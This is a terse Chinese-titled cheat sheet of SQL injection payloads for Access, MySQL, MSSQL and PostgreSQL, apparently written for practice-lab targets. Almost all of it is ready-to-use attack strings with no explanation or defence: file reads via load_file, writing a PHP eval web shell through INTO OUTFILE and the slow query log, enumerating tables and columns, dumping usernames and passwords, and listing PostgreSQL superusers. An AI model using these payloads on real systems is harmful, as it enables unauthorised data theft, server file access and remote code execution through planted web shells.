access mysql mssql postgresql熟悉四种基本数据库的注入

1
2
union select 1,load_file('d:/1.txt'),3,4,5

1
2
union select 1,‘shell’,3,4,5 into outfile ‘d:/1.txt’

1
2
3
4
set global slow_query_log=1;
set global slow_query_log_file='shell路径';
select '<?php eval($_GET[A])?>' or SLEEP(1);

1
2
3
4
and 1=2
union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null
union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

1
2
3
4
5
6
7
8
9
and 1=2
union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
and 1=2
union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
and 1=2
union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
and 1=2
union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null

1
2
and 1=2 union all select null,username, password ,null from manage

1
2
order by 4

1
2
and 1=2 union select null,null,null,null

1
2
3
4
5
and 1=2 union select 'null',null,null,null 错误
and 1=2 union select null,'null',null,null 正常
and 1=2 union select null,null,'null',null 正常
and 1=2 union select null,null,null,'null' 错误

1
2
3
4
and 1=2 UNION SELECT null,version(),null,null
and 1=2 UNION SELECT null,current_user,null,null
and 1=2 union select null,current_database(),null,null

1
2
and 1=2 union select null,string_agg(datname,','),null,null from pg_database

1
2
3
1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

1
2
and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'

1
2
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

1
2
and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE